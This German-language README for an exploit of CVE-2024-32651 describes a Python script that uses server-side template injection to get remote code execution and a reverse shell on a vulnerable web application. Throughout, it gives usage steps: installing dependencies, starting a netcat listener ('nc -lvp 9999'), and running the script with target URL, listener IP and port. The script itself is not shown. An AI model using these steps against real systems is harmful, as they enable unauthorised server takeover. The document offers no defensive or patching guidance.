
Exploit für Server-Side Template Injection
Server-Side Template Injection Exploit!!
Remote-Code-Ausführung durch Server-Side Template Injection (SSTI) in einer verwundbaren Webanwendung
Dieses Exploit zielt auf eine Webanwendung ab, die anfällig für Server-Side Template Injection (SSTI) ist. Durch Ausnutzung dieser Schwachstelle kann ein Angreifer beliebige Befehle auf dem Server ausführen. Das bereitgestellte Python-Skript automatisiert den Ausnutzungsprozess, indem es eine Payload übermittelt, die eine Reverse Shell auslöst.
Um die Schwachstelle zu reproduzieren, führen Sie das bereitgestellte Python-Skript gegen die verwundbare Webanwendung aus. Stellen Sie sicher, dass ein Listener (z. B. nc -lvp 9999) läuft, um die Reverse-Shell-Verbindung zu erfassen.
Speichern Sie das Skript in einer Datei mit dem Namen CVE-2024-32651.py.
Installieren Sie die erforderlichen Python-Bibliotheken, falls noch nicht geschehen:
pip install requests beautifulsoup4
Um das Skript zu verwenden, geben Sie die folgenden Befehlszeilenargumente an:
--url: Basis-URL der verwundbaren Webanwendung (z. B. http://10.10.10.10:5000).--port: Port des Listeners (z. B. 9999).--ip: IP-Adresse des Listeners (z. B. 10.10.50.22).--notification: (Optional) Benachrichtigungs-URL, wenn Sie eine bestimmte Benachrichtigungs-URL verwenden möchten.python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]
Diese korrigierte Version des Exploits basiert auf einem ursprünglichen Exploit, der von Zach Crosman (zcrosman) mit der EDB-ID: 52027 veröffentlicht wurde. Sie können den ursprünglichen Exploit hier einsehen. Ich danke Zach Crosman für seinen Beitrag zur Sicherheitscommunity.